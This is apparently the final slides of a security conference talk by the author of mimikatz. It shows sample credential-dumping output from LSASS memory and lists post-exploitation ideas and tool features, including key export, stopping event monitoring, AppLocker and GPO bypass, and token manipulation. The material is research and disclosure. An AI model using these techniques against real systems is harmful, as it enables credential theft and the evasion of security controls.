    @l_LogSessList = 000007F9C15E12B0
livessp
  @getLiveSSP
    livessp :
     * Utilisateur : sekurlsa@live.fr
     * Domaine : ps:password
  @getLiveSSPFunctions
    ** livessp.dll/lsasrv.dll ** ; Statut recherche : OK :)
    @LiveGlobalLogonSessionList = 000007F9C14E8C68
    @LsaUnprotectMemory = 000007F9C1C59960
kerberos
  @getKerberos
    kerberos :
     * Domaine : DEMO.LOCAL
  @getKerberosFunctions
    ** kerberos.dll/lsasrv.dll ** ; Statut recherche : OK :)
    @KerbGlobalLogonSessionTable = 000007F9C1955AE0
    @KerbLogonSessionList = 0000000000000000
    @LsaUnprotectMemory = 000007F9C1C59960

mimikatz :: sekurlsa, some ideas

- Meterpreter post module
- Standalone binary without injection (yeah, it's easy!):
  - read all data (sessions, encrypted passwords)
  - read all keys and implement your own (un)protectMemory routine
  - decrypt / crypt
- Extract all of this from a memory dump / hiberfil
- etc…
- Make demonstrations to your chief information security officer
- Ask Microsoft to work on a better implementation:
  - maybe offer the possibility to disable some functionalities
  - think globally about the data really needed for authentication

mimikatz, what else?

Crypto (mod_mimikatz_crypto, mod_crypto)
- Export non-exportable certificates and keys: CryptoAPI, CNG…

Stop event monitoring (mod_mimikatz_divers)

Basic GPO bypass (mod_mimikatz_nogpo)

Applocker / SRP bypass (kappfree.dll)

Driver (mimikatz.sys)
- Play with tokens & privileges
- Display SSDT x86 & x64
- List minifilters actions
- List notifications (process / thread / image / registry)
- List object hooks and procedures
- …

mimikatz, that's all folks!

Thanks to / Спасибо:
- my girlfriend for her support (her LSASS crashed a few times)
- Positive Technologies for offering me this great opportunity
- Microsoft for considering it normal/acceptable
- security friends/community for their ideas & challenges
- you, for your attention!

Questions? Don't be shy ;) especially if you have written down the corresponding slide number.

mimikatz source code

- Not available yet:
  - I'm not proud of mixing C/C++ and STL in LSASS
  - script kiddies will use it without understanding
- But a little part of it, for "pass the pass", is available
- So download it from the mimikatz download page: http://blog.gentilkiwi.com/mimikatz

Blog & Contact

blog/mimikatz : http://blog.gentilkiwi.com/mimikatz
email : benjamin@gentilkiwi.com
Twitter : @gentilkiwi